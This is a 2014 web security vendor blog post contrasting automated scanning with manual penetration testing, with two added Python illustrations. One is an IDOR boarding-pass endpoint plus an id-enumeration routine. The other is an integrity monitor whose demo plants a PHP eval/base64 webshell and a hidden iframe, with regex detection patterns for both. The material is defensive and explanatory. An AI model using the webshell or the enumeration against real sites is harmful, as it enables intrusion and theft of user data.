How to keep your website safe in 2015

Wednesday, December 17, 2014

Vulnerability scanning can be very cheap or even free, while penetration testing is comparatively expensive and time-consuming to plan and execute. Penetration testing, however, adds significant value over every type of malware or vulnerability scanning on the web security market today. This article looks at how businesses can use both kinds of service in parallel to reach the highest practical level of website security.


When security breaches fill the news with stories of stolen customer data and website failures, organisations may turn to automated scanners. However, there's still a common misconception that fully-automated website vulnerability scanning brings the same results as manual web application penetration testing.

The need for human skills was recently demonstrated by a major new analysis (reported by Ars Technica) conducted by the universities of KU Leuven (Belgium) and Stony Brook (New York). The researchers tested websites “protected” with various trust seals provided by security vendors delivering automated vulnerability and malware scanning services – reputable companies including Symantec, McAfee, Trust-Guard, and Qualys. The research showed "that seal providers perform very poorly when it comes to the detection of vulnerabilities on the websites that they certify." This is a weakness inherent in almost all fully-automated solutions – they can only go so far before their output needs to be analysed by a qualified pentester.

Vulnerability Scanning vs Penetration Testing

In fact, today almost anybody can do vulnerability scanning: download one of the many vulnerability scanners available (some of them quite good) and run it against a website. It will generate a report listing numerous actual and potential vulnerabilities and weaknesses, and probably a number of false positives as well. False positives are time-consuming: every issue the scanner reports has to be verified by hand. Much worse are false negatives, existing vulnerabilities that the automated tool misses, leaving the system exposed and giving the website administrator a false sense of security. Some scanners, for instance, assign a medium risk rating to 403 or 500 responses from the web server, which are error pages, not vulnerabilities. Administrators already under a heavy workload soon start ignoring every medium-risk finding in the daily scan reports, and as a result they miss the real vulnerabilities that deserve their attention.

Security scanners are probably a must-have tool for large companies that perform some of their security testing internally, with in-house security professionals capable of verifying and completing the results of an automated scan. Automated scanning is also a useful way of keeping an internal team up to date on the general state of its web applications. However, automated solutions and security scanners cannot replace a penetration test. Nor are they suited to SMBs, or to projects where a company needs both speed and the highest quality of security testing.

True pentesting starts where a vulnerability scan finishes. A pentester takes the reports from several different scans and uses their skills and experience to weed out the false positives and identify the vulnerabilities that were missed. In particular, a pentester is likely to recognise weaknesses in business logic, which scanners cannot efficiently detect, and to see how otherwise minor technical flaws can be chained together to cause a major breach. A recent example of an application logic flaw is Alibaba's website, where a tiny bug exposed the most sensitive information of millions of users. Another recent example is a similar vulnerability in the Delta Air Lines website, where URL manipulation allowed anyone's boarding pass to be retrieved.
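The "change the id in the URL" class of logic flaw mentioned above is worth seeing in code, because it shows why a scanner has nothing to match on. The following is an added illustration, not code from the original article or from any airline or Alibaba system: the endpoint, the parameter name, the account names and the sample records are all constructed for the example. The vulnerable handler authenticates the caller but never checks that the requested pass belongs to them; the hardened handler adds that one check.

```python
# Added illustration of an authorization (business logic) flaw of the
# "change the id in the URL" kind. Not code from the original article or
# from any real airline system; endpoint, parameter names and records
# are constructed for the example.
from dataclasses import dataclass
from typing import Optional

@dataclass(frozen=True)
class BoardingPass:
    pass_id: int
    owner: str       # account that made the booking
    passenger: str
    flight: str

# Constructed sample data. Sequential ids are what makes the flaw trivial
# to exploit once noticed: an attacker simply counts up or down from their own.
PASSES = {
    1001: BoardingPass(1001, "alice", "Alice Smith", "HTB123"),
    1002: BoardingPass(1002, "bob", "Bob Jones", "HTB123"),
    1003: BoardingPass(1003, "carol", "Carol Wu", "HTB456"),
}

def vulnerable_get_pass(session_user: Optional[str], pass_id: int):
    """GET /boardingpass?id=<pass_id> as it might have been written: the
    caller must be logged in, but nothing checks that the pass is theirs."""
    if session_user is None:
        return 401, {"error": "login required"}
    bp = PASSES.get(pass_id)
    if bp is None:
        return 404, {"error": "no such pass"}
    return 200, {"passenger": bp.passenger, "flight": bp.flight}

def hardened_get_pass(session_user: Optional[str], pass_id: int):
    """Same endpoint with the missing ownership check. A pass that exists
    but belongs to someone else is reported as 404 rather than 403, so the
    endpoint does not confirm which ids are valid."""
    if session_user is None:
        return 401, {"error": "login required"}
    bp = PASSES.get(pass_id)
    if bp is None or bp.owner != session_user:
        return 404, {"error": "no such pass"}
    return 200, {"passenger": bp.passenger, "flight": bp.flight}

def enumerate_passes(handler, session_user: str, id_range):
    """What a pentester does by hand and a generic scanner does not: log in
    as one user, walk neighbouring ids, keep everything that comes back 200.
    Returns {pass_id: response body}."""
    leaked = {}
    for pid in id_range:
        status, body = handler(session_user, pid)
        if status == 200:
            leaked[pid] = body
    return leaked

if __name__ == "__main__":
    # For the legitimate owner both versions answer identically, which is
    # why response matching alone cannot tell the flawed endpoint apart.
    print(vulnerable_get_pass("alice", 1001) == hardened_get_pass("alice", 1001))
    print(enumerate_passes(vulnerable_get_pass, "alice", range(1000, 1010)))
    print(enumerate_passes(hardened_get_pass, "alice", range(1000, 1010)))
```

Every response from the vulnerable handler is a well-formed 200 with valid data; there is no error string, stack trace or payload reflection for a signature to fire on. Only a tester who holds two accounts, or who knows which records alice should not be able to read, can recognise the leak.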

Another example of the vital need for deep IT and security expertise arises when a scanner reports a vulnerability that the security team already knows about and has left unpatched for a "good reason": in some cases the patch would break a critical business process. This is common in large companies, where many critical products are developed in-house or outsourced and suffer from compatibility issues that prevent keeping systems up to date. Here the scanner will just emit generic patching advice. A qualified pentester, on the other hand, understands the customer's business needs and processes and can suggest a solution that does not affect business continuity: if the vulnerability cannot be fixed, it can at least be made unexploitable, for example by adding a rule to the Web Application Firewall.

In our experience, most scanners find only about 40-60% of the vulnerabilities in a web application. This is not a shortcoming of scanning technology as such: a scanner could be built for one particular application, platform or framework that finds 99% of the vulnerabilities specific to it. But given the great variety of web technologies in use today, it is impossible to build a universal scanner that efficiently detects vulnerabilities in every type of web application. Human expertise is required.

Web penetration tests have their limits too. They cannot, for example, prevent a website administrator's PC from being compromised in order to steal FTP or SSH credentials and later infect the website with malware. Such malware, however, can be identified very quickly by daily malware scanning. Vulnerability scanning should be used for continuous security and integrity monitoring, while penetration testing should be used to identify all the existing vulnerabilities and weaknesses and to develop reliable fixes for them. Continuous daily monitoring combined with quarterly penetration testing is therefore the most efficient and effective way to keep a website secure.
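The daily integrity and malware check described above is simple enough to sketch end to end. What follows is an added illustration, not code from the original article or from ImmuniWeb: the web-root layout, the baseline format and the two indicator patterns are assumptions made for the example. The run hashes every file under the web root, diffs the result against the previous day's baseline, and then inspects only the new or changed files for webshell-style content, which is exactly the delta an attacker with stolen FTP or SSH credentials produces.

```python
# Added illustration of daily integrity plus malware monitoring of a web
# root. Not code from the original article or from ImmuniWeb; the site
# layout, baseline format and indicator patterns are assumptions.
import hashlib
import re
import tempfile
from pathlib import Path

# Constructed indicators: an obfuscated PHP dropper and a hidden iframe.
# A real scanner carries thousands of these; two are enough to show the flow.
SUSPICIOUS = {
    "php-eval-base64": re.compile(rb"eval\s*\(\s*base64_decode\s*\("),
    "hidden-iframe": re.compile(rb"<iframe[^>]*display\s*:\s*none"),
}

def snapshot(root):
    """Return {relative path: sha256 hex} for every regular file under root."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*")) if p.is_file()}

def diff_snapshots(baseline, current):
    """Split the two snapshots into added, modified and removed paths."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    return added, modified, removed

def scan_files(root, rel_paths):
    """Match the indicator list against each listed file; {path: [indicator names]}."""
    hits = {}
    for rel in rel_paths:
        data = (Path(root) / rel).read_bytes()
        names = [name for name, pat in SUSPICIOUS.items() if pat.search(data)]
        if names:
            hits[rel] = names
    return hits

def daily_check(root, baseline):
    """One monitoring run: integrity diff first, content scan on the delta only."""
    current = snapshot(root)
    added, modified, removed = diff_snapshots(baseline, current)
    flagged = scan_files(root, added + modified)
    return {"added": added, "modified": modified, "removed": removed,
            "flagged": flagged, "snapshot": current}

def build_demo_site(root):
    """Constructed clean site, the state the baseline is taken from."""
    root = Path(root)
    (root / "includes").mkdir(parents=True)
    (root / "index.php").write_bytes(b"<?php include 'includes/config.php'; echo 'hello'; ?>\n")
    (root / "includes" / "config.php").write_bytes(b"<?php $db = 'localhost'; ?>\n")
    (root / "about.html").write_bytes(b"<html><body>About us</body></html>\n")

def simulate_compromise(root):
    """Constructed attacker holding stolen FTP credentials: drops a webshell
    and injects a hidden iframe into an existing page."""
    root = Path(root)
    (root / "uploads").mkdir()
    (root / "uploads" / "cache.php").write_bytes(b"<?php eval(base64_decode($_POST['x'])); ?>\n")
    page = (root / "about.html").read_bytes()
    (root / "about.html").write_bytes(page.replace(
        b"</body>", b'<iframe src="http://example.invalid/" style="display:none"></iframe></body>'))

def demo():
    """Baseline on day one, compromise, check on day two; returns the report."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_site(tmp)
        baseline = snapshot(tmp)   # in practice: store this off-host
        simulate_compromise(tmp)
        return daily_check(tmp, baseline)

if __name__ == "__main__":
    report = demo()
    for path, names in report["flagged"].items():
        print(f"ALERT {path}: {', '.join(names)}")
```

Two practical points the sketch glosses over: the baseline must be stored and compared somewhere the attacker's stolen credentials cannot reach (an FTP account that can plant a webshell can also rewrite a baseline file kept in the web root), and a modified file with no indicator hit is still worth a human look, since new obfuscation will not match yesterday's patterns.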

As a solution to the gap between automated and manual security testing, High-Tech Bridge launched ImmuniWeb® SaaS this year, a hybrid approach to web security testing. ImmuniWeb combines manual and automated web security testing and suits businesses of every size, geographical location and level of internal skill. The speed and scale of automated testing, combined with human expertise and experience, accurately detects the most complex security flaws missed by scanners and other automated solutions. Moreover, ImmuniWeb auditors provide customers with personalised solutions suited to their business and technical needs.


Ilia N. Kolochenko is the CEO and Founder of ImmuniWeb. Ilia is a member of Forbes Technology Council, and a contributor to CSO Online, SC Magazine UK, Dark Reading and Forbes magazines.